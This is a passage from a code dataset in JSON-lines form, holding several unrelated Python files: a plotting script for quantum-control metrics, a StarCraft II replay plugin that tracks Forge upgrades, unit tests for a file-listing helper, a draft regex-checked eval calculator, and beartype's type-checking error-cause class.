\n\n fig, ax = plt.subplots(figsize=(7,7))\n # ax.scatter(-1*q951[noise_index], wd_data_c1[noise_index], alpha=0.5, c=\"blue\", \n # label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.95\"+f\" \\n Spearman={spearman1}\")\n # # plt.scatter(-1*q952[2], wd_data_c2[2], alpha=0.5, c=\"orange\")\n # ax.scatter(-1*q981[noise_index], wd_data_c1[noise_index], alpha=0.5, marker=\"o\", \n # label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.98\"+f\" \\n Spearman={spearman2}\")\n for k in range(1,p+1):\n ax.scatter(rim_k(2)[noise_index], rim_k(k)[noise_index], alpha=0.5, marker=r\"${}$\".format(k), \n label=f\"k={k}\", s=100)\n # plt.scatter(-1*q982[3], wd_data_c2[3], alpha=0.5, marker=\"o\")\n ax.set_xlabel(r\"$\\rm{RIM}_1$\", fontsize=fs)\n ax.set_ylabel(r\"$\\rm{RIM}_k$\", fontsize=fs)\n ax.tick_params(axis='both', which='major', labelsize=fs)\n ax.legend(fontsize=15)\n ax.set_title(r\"$\\sigma_{\\rm sim}=$\"+f\"{self.noises[noise_index]}, {algname1}\", fontsize=fs)\n # savename=\"qfactorintuition_N\"+str(self.Nspin)+\"to\"+str(self.outspin)\n # fname = self.save_fig(fig, name=savename, copyto=self.poster_fig_save_folder)\n return\n \n def exploring_metrics(self, noise_index: int = 2, topk=200, allnoisesplot=False):\n fs=25; algname1=\"\"\n lbfgs_wd_data = self.get_metrics_dict(None, self.noises, algoname=\"lbfgs\")[\"lbfgs\"]\n ppo_wd_data = self.get_metrics_dict(self.noises[noise_index], self.noises, algoname=\"ppo\")[\"ppo\"]\n wd_data_c1 = np.array(lbfgs_wd_data[r'$W(.,\\delta(x-1))$'])\n idxes1 = self.get_top_k_by_fid_idx(wd_data_c1, topk=topk)\n wd_data_c1 = wd_data_c1[idxes1]\n # wd_data_u, wd_data_l = wd_data[r'$W(.,\\delta(x-1))$'+ ' upper'], wd_data[r'$W(.,\\delta(x-1))$'+ ' lower'] \n \n q951 = np.array(lbfgs_wd_data['Q th. 0.95'])[idxes1]\n q981 = np.array(lbfgs_wd_data['Q th. 0.98'])[idxes1]\n \n\n # savefile = {\"rim\":wd_data_c1.tolist(), \"q_98\":q981.tolist(), \"q_95\":q951.tolist()}\n # json.dump(savefile, open(\"rim_fig1_data.json\", \"w\"))\n \n ######## ppo controllers ################\n # wd_data_c2 = np.array(ppo_wd_data[r'$W(.,\\delta(x-1))$'])\n # idxes2 = self.get_top_k_by_fid_idx(wd_data_c2, topk=topk)\n # wd_data_c2 = wd_data_c2[idxes2]\n # q952 = np.array(ppo_wd_data['Q th. 0.95'])[idxes2]\n # q982 = np.array(ppo_wd_data['Q th. 0.98'])[idxes2]\n \n \n from scipy.stats import spearmanr\n import seaborn as sns\n sns.set()\n spearman1 = round(spearmanr(-1*q951[noise_index], wd_data_c1[noise_index])[0],3)\n spearman2 = round(spearmanr(-1*q981[noise_index], wd_data_c1[noise_index])[0],3)\n if not allnoisesplot:\n fig, ax = plt.subplots(figsize=(7,7))\n ax.scatter(-1*q951[noise_index], wd_data_c1[noise_index], alpha=0.5, c=\"blue\", \n label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.95\"+f\" \\n Spearman={spearman1}\")\n # plt.scatter(-1*q952[2], wd_data_c2[2], alpha=0.5, c=\"orange\")\n ax.scatter(-1*q981[noise_index], wd_data_c1[noise_index], alpha=0.5, marker=\"o\", \n label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.98\"+f\" \\n Spearman={spearman2}\")\n # plt.scatter(-1*q982[3], wd_data_c2[3], alpha=0.5, marker=\"o\")\n ax.set_xlabel(r\"$Y(\\mathcal{F}_{\\rm Th})$\", fontsize=fs)\n ax.set_ylabel(\"RIM\", fontsize=fs)\n ax.tick_params(axis='both', which='major', labelsize=fs)\n ax.legend(fontsize=15)\n ax.set_title(r\"$\\sigma_{\\rm sim}=$\"+f\"{self.noises[noise_index]}, {algname1}\", fontsize=fs)\n savename=\"qfactorintuition_N\"+str(self.Nspin)+\"to\"+str(self.outspin)\n fname = self.save_fig(fig, name=savename, copyto=self.poster_fig_save_folder)\n return\n \n else:\n fig, ax = plt.subplots(nrows=5, ncols=2)\n ax = ax.ravel()\n fs=15\n for noise_index in range(1,len(self.noises)):\n spearman1 = round(spearmanr(-1*q951[noise_index], wd_data_c1[noise_index])[0],3)\n spearman2 = round(spearmanr(-1*q981[noise_index], wd_data_c1[noise_index])[0],3)\n ax[noise_index-1].scatter(-1*q951[noise_index], wd_data_c1[noise_index], alpha=0.5, c=\"blue\", \n label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.95\"+f\" \\n Spearman={spearman1}\")\n # plt.scatter(-1*q952[2], wd_data_c2[2], alpha=0.5, c=\"orange\")\n ax[noise_index-1].scatter(-1*q981[noise_index], wd_data_c1[noise_index], alpha=0.5, marker=\"o\", \n label=r\"$\\mathcal{F}_{\\rm Th}$\"+\"=0.98\"+f\" \\n Spearman={spearman2}\")\n # plt.scatter(-1*q982[3], wd_data_c2[3], alpha=0.5, marker=\"o\")\n ax[noise_index-1].set_xlabel(r\"$Y(\\mathcal{F}_{\\rm Th})$\", fontsize=fs)\n ax[noise_index-1].set_ylabel(\"RIM\", fontsize=fs)\n ax[noise_index-1].tick_params(axis='both', which='major', labelsize=fs)\n ax[noise_index-1].legend(fontsize=fs-5)\n ax[noise_index-1].set_ylim(0,1)\n ax[noise_index-1].set_xlim(0,1)\n ax[noise_index-1].set_title(r\"$\\sigma_{\\rm sim}=$\"+f\"{self.noises[noise_index]}, {algname1}\", fontsize=fs)\n ax = ax.reshape((5,2))\n remove_redundant_ticks(ax, pltrows=5, pltcols=2, remove_x_title_too=True)\n # plt.tight_layout()\n\n\nfor n,o in zip([4,5,6,7,4,5,6,7], [2,2,3,3,3,4,5,6]):\n y = MCDataSim(experiment_name=\"pipeline_snob\", Nspin=n, outspin=o,\n bootreps=100, parallel=False, numcontrollers=1000, filemarker=\".le\", #None,\n noises=np.linspace(0,0.1,11))\n for algo in [\"snob\", \"ppo\", \"lbfgs\"]:\n for i in range(10):\n try:\n y.exploring_rim_k(noise_index=i, save_dir=\"rim_p_figs\", topk=50, algo=algo)\n except Exception as e:\n print(e)","sub_path":"exploring_rimk.py","file_name":"exploring_rimk.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"102105948","text":"from sys import maxint\n\nfrom Buildings.BuildingManager import BuildTypes\nfrom Buildings.BuildingManager import BuildingManager\nfrom Buildings.Forge import Forge\nfrom Buildings.Forge import Upgrade\nfrom Buildings.Nexus import ChronoBoost\n\n# Plugin to keep track of a player's forges throughout the game. Accounts for\n# each upgrade researched by a forge, and each ChronoBoost applied to a forge.\nclass ForgePlugin(object):\n\t# Name of the player to watch during the replay\n\tplayerName = str()\n\n\t# Length of the game (in seconds)\n\tgameLength = int()\n\n\t# A reference to the global building manager\n\tbuildingManager = object()\n\n\tdef __init__(self, playerName):\n\t\tself.name = self.__class__.__module__\n\n\t\tself.playerName = playerName\n\t\tself.gameLength = 0\n\t\tself.buildingManager = BuildingManager.GetInstance()\n\n\tdef __str__(self):\n\t\tforges = self.buildingManager.GetAllBuildings(BuildTypes.FORGE)\n\t\tforges = sorted(forges.items(), key=lambda tup: tup[1].buildStartTime)\n\n\t\tret = '%d forge(s) constructed\\n\\n' % (len(forges))\n\n\t\tfor i in range(len(forges)):\n\t\t\tret += str(forges[i][1]) + '\\n'\n\n\t\treturn ret\n\n\t# Game started\n\tdef handleInitGame(self, event, replay):\n\t\tself.gameLength = replay.game_length.seconds\n\n\t# Upgrade start\n\tdef handleBasicCommandEvent(self, event, replay):\n\t\tif event.player.name != self.playerName:\n\t\t\treturn\n\n\t\tupgradeName = event.ability.name\n\t\tupgradeType = Upgrade.GetType(upgradeName)\n\t\tupgradeLevel = Upgrade.GetLevel(upgradeName)\n\n\t\tif (upgradeType == -1) or (upgradeLevel == -1):\n\t\t\treturn\n\n\t\tupgradeID = event.ability_id\n\t\tstartTime = event.second\n\n\t\t# The currently active selection is index 10\n\t\tactiveSelection = event.player.selection[10]\n\t\tselectedForges = [self.buildingManager.GetBuilding(o.id) for o in activeSelection if (o.name == Forge.NAME)]\n\n\t\t# Then round robin select the forge which should do this upgrade\n\t\tforge = self._getCastingForge(startTime, selectedForges)\n\n\t\tif forge is not None:\n\t\t\tupgrade = Upgrade(forge.destroyedTime, startTime, upgradeName, upgradeType, upgradeLevel)\n\t\t\tforge.addUpgrade(upgradeID, upgrade)\n\t\telse:\n\t\t\traise Exception('Performing upgrade on unknown Forge: ' + upgradeName)\n\n\t# Upgrade complete\n\tdef handleUpgradeCompleteEvent(self, event, replay):\n\t\tif event.player.name != self.playerName:\n\t\t\treturn\n\n\t\tupgrade = None\n\t\tupgradeName = event.upgrade_type_name\n\t\tupgradeType = Upgrade.GetType(upgradeName)\n\t\tupgradeLevel = Upgrade.GetLevel(upgradeName)\n\n\t\tif (upgradeType == -1) or (upgradeLevel == -1):\n\t\t\treturn\n\n\t\tforges = self.buildingManager.GetAllBuildings(BuildTypes.FORGE)\n\n\t\tfor forgeID in forges:\n\t\t\tforge = forges[forgeID]\n\t\t\tnextUpgrade = forge.findLastUpgradeByTypeAndLevel(upgradeType, upgradeLevel)\n\n\t\t\tif nextUpgrade is not None:\n\t\t\t\tif upgrade is None or nextUpgrade.startTime > upgrade.startTime:\n\t\t\t\t\tupgrade = nextUpgrade\n\n\t\tif upgrade is not None:\n\t\t\tupgrade.endTime = event.second\n\t\telse:\n\t\t\traise Exception('Upgrade completed with no known start: ' + upgradeName)\n\n\t# Chrono boost\n\tdef handleTargetUnitCommandEvent(self, event, replay):\n\t\tif event.player.name != self.playerName:\n\t\t\treturn\n\n\t\tif not event.has_ability or (event.ability.name != ChronoBoost.NAME):\n\t\t\treturn\n\n\t\tforge = self.buildingManager.GetBuilding(event.target.id)\n\n\t\t# For now just add the ChronoBoost to the forge, since we don't know\n\t\t# when every upgrade will start/end yet\n\t\tif (forge is not None) and (forge.buildType == BuildTypes.FORGE):\n\t\t\tforge.addChronoBoost(ChronoBoost(event.second))\n\n\t# Game finished\n\tdef handleEndGame(self, event, replay):\n\t\tforges = self.buildingManager.GetAllBuildings(BuildTypes.FORGE)\n\n\t\tfor forgeID in forges:\n\t\t\tforge = forges[forgeID]\n\n\t\t\t# Queued upgrades will have incorrect start times. Fix them.\n\t\t\tforge.fixUpgradeStartTimes()\n\n\t\t\t# Assign all ChronoBoosts to specific upgrades\n\t\t\tfor chronoBoost in forge.chronoBoosts:\n\t\t\t\t# Get all upgrades in the ChronoBoost time range (boost may apply to multiple)\n\t\t\t\tupgrades = forge.findUpgradesByTime(chronoBoost.startTime, chronoBoost.endTime)\n\n\t\t\t\tfor upgrade in upgrades:\n\t\t\t\t\tupgrade.addChronoBoost(chronoBoost)\n\n\t# From a list of currently selected forges, round-robin select a forge to\n\t# perform the next upgrade\n\tdef _getCastingForge(self, time, selectedForges):\n\t\tminForge = None\n\t\tminCount = maxint\n\n\t\tfor forge in selectedForges:\n\t\t\tupgradeCount = 0\n\n\t\t\tfor upgradeID in forge.upgrades:\n\t\t\t\tupgrade = forge.upgrades[upgradeID]\n\n\t\t\t\tif (upgrade.startTime <= time) and (time <= upgrade.endTime):\n\t\t\t\t\tupgradeCount += 1\n\n\t\t\tif upgradeCount < minCount:\n\t\t\t\tminCount = upgradeCount\n\t\t\t\tminForge = forge\n\n\t\treturn minForge\n\n","sub_path":"Plugins/ForgePlugin.py","file_name":"ForgePlugin.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"515462749","text":"\"\"\" Unit test to test get_files\n\"\"\"\nimport random\nimport string\nimport tempfile\nimport unittest\n\nfrom get_files import get_files\n\n\nclass TestGetFiles(unittest.TestCase):\n \"\"\"\n Class to test get_files module\n \"\"\"\n\n def test_get_all_files(self):\n \"\"\" Tests get list of files in temp dir.\n \"\"\"\n\n temp_dir = tempfile.gettempdir()\n all_files = get_files.get_files_by_regex(temp_dir, '')\n\n self.assertGreater(len(all_files), 0)\n\n def test_get_file_by_regex(self):\n \"\"\" Tests get list of files by regex.\n \"\"\"\n\n temp_dir = tempfile.gettempdir()\n temp = tempfile.NamedTemporaryFile(\n prefix=\"dummyPrefix_\", suffix=\"_dummySuffix\")\n dummy_file = get_files.get_files_by_regex(temp_dir, 'dummyPrefix_')\n\n self.assertEqual(len(dummy_file), 1)\n\n def test_get_file_not_valid(self):\n \"\"\" Tests get list of files for invalid directory.\n \"\"\"\n\n random_dir = ''.join(random.choice(string.ascii_lowercase)\n for i in range(10))\n\n random_dir_files = get_files.get_files_by_regex(random_dir, '')\n\n self.assertEqual(len(random_dir_files), 0)\n\n def test_get_file_not_valid_regex(self):\n \"\"\" Tests get list of files for random regex.\n \"\"\"\n\n temp_dir = tempfile.gettempdir()\n random_regex = ''.join(random.choice(\n string.ascii_lowercase) for i in range(10))\n regex_files = get_files.get_files_by_regex(temp_dir, random_regex)\n\n self.assertEqual(len(regex_files), 0)\n\n def test_get_not_valid_regex(self):\n \"\"\" Tests get list of files for random regex.\n \"\"\"\n temp_dir = tempfile.gettempdir()\n random_regex = '**'\n try:\n get_files.get_files_by_regex(temp_dir, random_regex)\n except:\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/get_files_test.py","file_name":"get_files_test.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"399753690","text":"\nfrom re import fullmatch,search\na = '3/4 +6**2-6*4 -123 +6*3**---2//4 +100/55='\nb = '3/4 +6**2-6*4/ 0 -123 +6*3**2/4 +100/0='\nc = ''\ndef calc(c):\n\tif fullmatch(r'[0-9\\/\\*\\-\\+\\ ]+',c[:-1]) and not search(r'\\/\\s*0',c[:-1]) and c[-1] == '=':\n\t\tprint(eval(c[:-1]))\n\telse:\n\t\tprint('Wrong request!')\n\t\ncalc(a)\ncalc(b)\ncalc(c)\n\n#3.25\n#Wrong request!\n#Wrong request!\n#[Program finished]\n\n#brackets need exceptiob zero\n# хотя можно и вычислять то, что в кобках..., если цель без эксепшнов\n# через стэк самые вложенные скобки\n# или рег группами о.о\n#parenthisis check for balanced\n#zapretit sosedstvo (*, +), но оставить (-\n\n#add parsing %\n#any ----at the end of operation\n#allow **, //\n#forbid any other 2symbol\n#make it decimal\n#separate errors in other ifs\n\n#test with random generated\n#похоже, что решение через евал не легче, т.к. сменили сложность вычислений на сложность проверки\n\ndef do_parentheses_match(input_string):\n s = []\n balanced = True\n index = 0\n while index < len(input_string) and balanced:\n token = input_string[index]\n if token == \"(\":\n s.append(token)\n elif token == \")\":\n if len(s) == 0:\n balanced = False\n else:\n s.pop()\n\n index += 1\n\n return balanced and len(s) == 0\n \n ","sub_path":"regexp_calc_draft.py","file_name":"regexp_calc_draft.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449069319","text":"#!/usr/bin/env python3\n# --------------------( LICENSE )--------------------\n# Copyright (c) 2014-2021 Beartype authors.\n# See \"LICENSE\" for further details.\n\n'''\n**Beartype type-checking error cause sleuth** (i.e., object recursively\nfabricating the human-readable string describing the failure of the pith\nassociated with this object to satisfy this PEP-compliant type hint also\nassociated with this object) classes.\n\nThis private submodule is *not* intended for importation by downstream callers.\n'''\n\n# ....................{ IMPORTS }....................\nfrom beartype.cave import NoneType, NoneTypeOr\nfrom beartype.roar import _BeartypeCallHintPepRaiseException\nfrom beartype._util.hint.pep.proposal.utilhintpep484 import (\n get_hint_pep484_newtype_class,\n is_hint_pep484_newtype,\n)\nfrom beartype._util.hint.pep.proposal.utilhintpep544 import (\n get_hint_pep544_io_protocol_from_generic,\n is_hint_pep544_io_generic,\n)\nfrom beartype._util.hint.pep.proposal.utilhintpep593 import (\n get_hint_pep593_hint,\n is_hint_pep593,\n)\nfrom beartype._util.hint.pep.utilhintpepget import (\n get_hint_pep_args,\n get_hint_pep_generic_bases_unerased,\n get_hint_pep_sign,\n)\nfrom beartype._util.hint.pep.utilhintpeptest import (\n is_hint_pep,\n is_hint_pep_generic,\n is_hint_pep_tuple_empty,\n is_hint_pep_typevar,\n)\nfrom beartype._util.hint.utilhinttest import (\n is_hint_forwardref,\n is_hint_ignorable,\n)\nfrom typing import Any, Callable, NoReturn, Optional, Tuple\n\n# See the \"beartype.cave\" submodule for further commentary.\n__all__ = ['STAR_IMPORTS_CONSIDERED_HARMFUL']\n\n# ....................{ CLASSES }....................\nclass CauseSleuth(object):\n '''\n **Type-checking error cause sleuth** (i.e., object recursively fabricating\n the human-readable string describing the failure of the pith associated\n with this object to satisfy this PEP-compliant type hint also associated\n with this object).\n\n Attributes\n ----------\n cause_indent : str\n **Indentation** (i.e., string of zero or more spaces) preceding each\n line of the string returned by this getter if this string spans\n multiple lines *or* ignored otherwise (i.e., if this string is instead\n embedded in the current line).\n exception_label : str\n Human-readable label describing the parameter or return value from\n which this object originates, typically embedded in exceptions raised\n from this getter in the event of unexpected runtime failure.\n func : Callable\n Decorated callable generating this type-checking error.\n hint_sign : Any\n Unsubscripted :mod:`typing` attribute identifying this hint if this hint\n is PEP-compliant *or* ``None`` otherwise.\n hint_childs : Optional[Tuple]\n Either:\n\n * If this hint is PEP-compliant:\n\n * If this hint is a generic, tuple of the one or more unerased\n pseudo-superclasses (i.e., :mod:`typing` objects originally listed\n as superclasses prior to their implicit type erasure by the\n :mod:`typing` module) subclassed by this generic.\n * Else, the possibly empty tuple of all arguments subscripting this\n hint if this\n\n * Else, ``None``.\n pith : Any\n Arbitrary object to be validated.\n random_int: Optional[int]\n **Pseudo-random integer** (i.e., unsigned 32-bit integer\n pseudo-randomly generated by the parent :func:`beartype.beartype`\n wrapper function in type-checking randomly indexed container items by\n the current call to that function) if that function generated such an\n integer *or* ``None`` otherwise (i.e., if that function generated *no*\n such integer). See the same parameter accepted by the higher-level\n :func:`beartype._decor._code._pep._error.peperror.raise_pep_call_exception`\n function for further details.\n\n Attributes (Private)\n ----------\n _hint : Any\n Type hint to validate this object against.\n '''\n\n # ..................{ CLASS VARIABLES }..................\n # Slot *ALL* instance variables defined on this object to both:\n # * Prevent accidental declaration of erroneous instance variables.\n # * Minimize space and time complexity.\n __slots__ = (\n 'cause_indent',\n 'exception_label',\n 'func',\n 'hint_sign',\n 'hint_childs',\n 'pith',\n 'random_int',\n '_hint',\n )\n\n\n _INIT_PARAM_NAMES = frozenset((\n 'cause_indent',\n 'exception_label',\n 'func',\n 'hint',\n 'pith',\n 'random_int',\n ))\n '''\n Frozen set of the names of all parameters accepted by the :meth:`init`\n method, defined as a set to enable efficient membership testing.\n '''\n\n # ..................{ INITIALIZERS }..................\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n # CAUTION: Whenever adding, deleting, or renaming any parameter accepted by\n # this method, make similar changes to the \"_INIT_PARAM_NAMES\" set above.\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n def __init__(\n self,\n func: Callable,\n pith: Any,\n hint: Any,\n cause_indent: str,\n exception_label: str,\n random_int: int,\n ) -> None:\n '''\n Initialize this object.\n '''\n assert callable(func), f'{repr(func)} not callable.'\n assert isinstance(cause_indent, str), (\n f'{repr(cause_indent)} not string.')\n assert isinstance(exception_label, str), (\n f'{repr(exception_label)} not string.')\n assert isinstance(random_int, NoneTypeOr[int]), (\n f'{repr(random_int)} not integer or \"None\".')\n\n # Classify all passed parameters.\n self.func = func\n self.pith = pith\n self.cause_indent = cause_indent\n self.exception_label = exception_label\n self.random_int = random_int\n\n # Nullify all remaining parameters for safety.\n self.hint_sign: Any = None\n self.hint_childs: Tuple = None # type: ignore[assignment]\n\n # Classify this hint *AFTER* initializing all parameters above.\n self.hint = hint\n\n # ..................{ PROPERTIES }..................\n @property\n def hint(self) -> Any:\n '''\n Type hint to validate this object against.\n '''\n\n return self._hint\n\n\n @hint.setter\n def hint(self, hint: Any) -> None:\n '''\n Set the type hint to validate this object against.\n '''\n\n # ................{ REDUCTION }................\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n # CAVEATS: Synchronize changes here with the corresponding block of the\n # beartype._decor._code._pep._pephint.pep_code_check_hint() function.\n #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n #\n # This logic reduces the currently visited hint to an arbitrary object\n # associated with this hint when this hint conditionally satisfies any\n # of various conditions.\n #\n # ................{ REDUCTION ~ pep 484 }................\n # If this is the PEP 484-compliant \"None\" singleton, reduce this hint\n # to the type of that singleton. While not explicitly defined by the\n # \"typing\" module, PEP 484 explicitly supports this singleton:\n # When used in a type hint, the expression None is considered\n # equivalent to type(None).\n if hint is None:\n hint = NoneType\n # If this is a PEP 484-compliant new type hint, reduce this hint to the\n # user-defined class aliased by this hint. Although this logic could\n # also be performed below, doing so here simplifies matters.\n elif is_hint_pep484_newtype(hint):\n hint = get_hint_pep484_newtype_class(hint)\n # ................{ REDUCTION ~ pep 544 }................\n # If this is a PEP 484-compliant IO generic base class *AND* the active\n # Python interpreter targets at least Python >= 3.8 and thus supports\n # PEP 544-compliant protocols, reduce this functionally useless hint to\n # the corresponding functionally useful beartype-specific PEP\n # 544-compliant protocol implementing this hint.\n #\n # Note that PEP 484-compliant IO generic base classes are technically\n # usable under Python < 3.8 (e.g., by explicitly subclassing those\n # classes from third-party classes). Ergo, we can neither safely emit\n # warnings nor raise exceptions on visiting these classes under *ANY*\n # Python version.\n elif is_hint_pep544_io_generic(hint):\n hint = get_hint_pep544_io_protocol_from_generic(hint)\n # ................{ REDUCTION ~ pep 593 }................\n # If this is a PEP 593-compliant type metahint, ignore all annotations\n # on this hint (i.e., \"hint_curr.__metadata__\" tuple) by reducing this\n # hint to its origin (e.g., \"str\" in \"Annotated[str, 50, False]\").\n elif is_hint_pep593(hint):\n hint = get_hint_pep593_hint(hint)\n # ................{ REDUCTION ~ end }................\n\n # If this hint is PEP-compliant...\n if is_hint_pep(hint):\n # Arbitrary object uniquely identifying this hint.\n self.hint_sign = get_hint_pep_sign(hint)\n\n # Tuple of either...\n self.hint_childs = (\n # If this hint is a generic, the one or more unerased\n # pseudo-superclasses originally subclassed by this hint.\n get_hint_pep_generic_bases_unerased(hint)\n if is_hint_pep_generic(hint) else\n # Else, the zero or more arguments subscripting this hint.\n get_hint_pep_args(hint)\n )\n\n # Classify this hint *AFTER* all other assignments above.\n self._hint = hint\n\n # ..................{ GETTERS }..................\n def get_cause_or_none(self) -> Optional[str]:\n '''\n Human-readable string describing the failure of this pith to satisfy\n this PEP-compliant type hint if this pith fails to satisfy this pith\n *or* ``None`` otherwise (i.e., if this pith satisfies this hint).\n\n Design\n ----------\n This getter is intentionally generalized to support objects both\n satisfying and *not* satisfying hints as equally valid use cases. While\n the parent :func:`.peperror.raise_pep_call_exception` function\n calling this getter is *always* passed an object *not* satisfying the\n passed hint, this getter is under no such constraints. Why? Because\n this getter is also called to find which of an arbitrary number of\n objects transitively nested in the object passed to\n :func:`.peperror.raise_pep_call_exception` fails to satisfy the\n corresponding hint transitively nested in the hint passed to that\n function.\n\n For example, consider the PEP-compliant type hint ``List[Union[int,\n str]]`` describing a list whose items are either integers or strings\n and the list ``list(range(256)) + [False,]`` consisting of the integers\n 0 through 255 followed by boolean ``False``. Since this list is a\n standard sequence, the\n :func:`._peperrorsequence.get_cause_or_none_sequence_standard`\n function must decide the cause of this list's failure to comply with\n this hint by finding the list item that is neither an integer nor a\n string, implemented by by iteratively passing each list item to the\n :func:`._peperrorunion.get_cause_or_none_union` function. Since\n the first 256 items of this list are integers satisfying this hint,\n :func:`._peperrorunion.get_cause_or_none_union` returns\n ``None`` to\n :func:`._peperrorsequence.get_cause_or_none_sequence_standard`\n before finally finding the non-compliant boolean item and returning the\n human-readable cause.\n\n Returns\n ----------\n Optional[str]\n Either:\n\n * If this object fails to satisfy this hint, human-readable string\n describing the failure of this object to do so.\n * Else, ``None``.\n\n Raises\n ----------\n _BeartypeCallHintPepRaiseException\n If this type hint is either:\n\n * PEP-noncompliant (e.g., tuple union).\n * PEP-compliant but no getter function has been implemented to\n handle this category of PEP-compliant type hint yet.\n '''\n\n # Getter function returning the desired string.\n get_cause_or_none = None\n\n # If this hint is ignorable, all possible objects satisfy this hint,\n # implying this hint *CANNOT* by definition be the cause of this\n # failure. In this case, immediately report None.\n if is_hint_ignorable(self.hint):\n return None\n # Else, this hint is unignorable.\n #\n # If *NO* sign uniquely identifies this hint, this hint is\n # PEP-noncompliant. In this case...\n elif self.hint_sign is None:\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error._peperrortype import (\n get_cause_or_none_type)\n\n # Defer to the getter function supporting non-\"typing\" classes.\n get_cause_or_none = get_cause_or_none_type\n # Else, this hint is PEP-compliant.\n #\n # If this PEP-compliant hint is its own unsubscripted \"typing\"\n # attribute (e.g., \"typing.List\" rather than \"typing.List[str]\") and is\n # thus subscripted by *NO* child hints...\n elif self.hint is self.hint_sign:\n # If this hint is the non-standard \"typing.NoReturn\" type hint\n # specific to return values...\n if self.hint is NoReturn:\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error._peperrorreturn import (\n get_cause_or_none_noreturn)\n\n # Defer to the getter function specific to this hint.\n get_cause_or_none = get_cause_or_none_noreturn\n # Else, this hint is a standard PEP-compliant type hint supported\n # by both parameters and return values. In this case, we assume\n # this hint to originate from an origin type.\n else:\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error._peperrortype import (\n get_cause_or_none_type_origin)\n\n # Defer to the getter function supporting hints originating\n # from origin types.\n get_cause_or_none = get_cause_or_none_type_origin\n # Else, this PEP-compliant hint is *NOT* its own unsubscripted \"typing\"\n # attribute. In this case...\n else:\n # If this hint is neither...\n if not (\n # Subscripted by no child hints *NOR*...\n self.hint_childs or\n # An empty fixed-length tuple hint, whose PEP 585 (but *NOT*\n # PEP 484)-compliant implementation is subscripted by no child\n # hints *NOR*...\n is_hint_pep_tuple_empty(self.hint) or\n # A forward reference nor type variable, whose designs reside\n # well outside the standard \"typing\" dunder variable API and\n # are thus *NEVER* subscripted by child hints...\n is_hint_forwardref(self.hint) or\n is_hint_pep_typevar(self.hint)\n ):\n # Then this hint should have been subscripted by one or more child\n # hints but wasn't. In this case, raise an exception.\n raise _BeartypeCallHintPepRaiseException(\n f'{self.exception_label} PEP type hint '\n f'{repr(self.hint)} unsubscripted.'\n )\n # Else, thus subscripted by one or more child hints (e.g.,\n # \"typing.List[str]\" rather than \"typing.List\")\n #\n # Else, this hint is subscripted by one or more child hints.\n\n # Avoid circular import dependencies.\n from beartype._decor._code._pep._error.peperror import (\n PEP_HINT_SIGN_TO_GET_CAUSE_FUNC)\n\n # Getter function returning the desired string for this attribute\n # if any *OR* \"None\" otherwise.\n get_cause_or_none = PEP_HINT_SIGN_TO_GET_CAUSE_FUNC.get(\n self.hint_sign, None)\n\n # If no such function has been implemented to handle this attribute\n # yet, raise an exception.\n if get_cause_or_none is None:\n raise _BeartypeCallHintPepRaiseException(\n f'{self.exception_label} PEP type hint '\n f'{repr(self.hint)} unsupported (i.e., no '\n f'\"get_cause_or_none_\"-prefixed getter function defined '\n f'for this category of hint).'\n )\n # Else, a getter function has been implemented to handle this\n # attribute.\n\n # Call this getter function with ourselves and return the string\n # returned by this getter.\n return get_cause_or_none(self)\n\n # ..................{ PERMUTERS }..................\n def permute(self, **kwargs) -> 'CauseSleuth':\n '''\n Shallow copy of this object such that each the passed keyword argument\n overwrites the instance variable of the same name in this copy.\n\n Parameters\n ----------\n Keyword arguments of the same name and type as instance variables of\n this object (e.g., ``hint``, ``pith``).\n\n Returns\n ----------\n CauseSleuth\n Shallow copy of this object such that each keyword argument\n overwrites the instance variable of the same name in this copy.\n\n Raises\n ----------\n _BeartypeCallHintPepRaiseException\n If the name of any passed keyword argument is *not* the name of an\n existing instance variable of this object.\n\n Examples\n ----------\n >>> sleuth = CauseSleuth(\n ... pith=[42,]\n ... hint=typing.List[int],\n ... cause_indent='',\n ... exception_label='List of integers',\n ... )\n >>> sleuth_copy = sleuth.permute(pith=[24,])\n >>> sleuth_copy.pith\n [24,]\n >>> sleuth_copy.hint\n typing.List[int]\n '''\n\n # For the name of each passed keyword argument...\n for param_name in kwargs.keys():\n # If this name is *NOT* that of a parameter accepted by the\n # __init__() method, raise an exception.\n if param_name not in self._INIT_PARAM_NAMES:\n raise _BeartypeCallHintPepRaiseException(\n f'{self.__class__}.__init__() parameter '\n f'{param_name} unrecognized.'\n )\n\n # For the name of each parameter accepted by the __init__() method...\n for param_name in self._INIT_PARAM_NAMES:\n # If this parameter was *NOT* explicitly passed by the caller,\n # default this parameter to its current value from this object.\n if param_name not in kwargs:\n kwargs[param_name] = getattr(self, param_name)\n\n # Return a new instance of this class initialized with these arguments.\n return CauseSleuth(**kwargs)\n","sub_path":"beartype/_decor/_code/_pep/_error/_peperrorsleuth.py","file_name":"_peperrorsleuth.py","file_ext":"py","file_size_in_byte":20042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
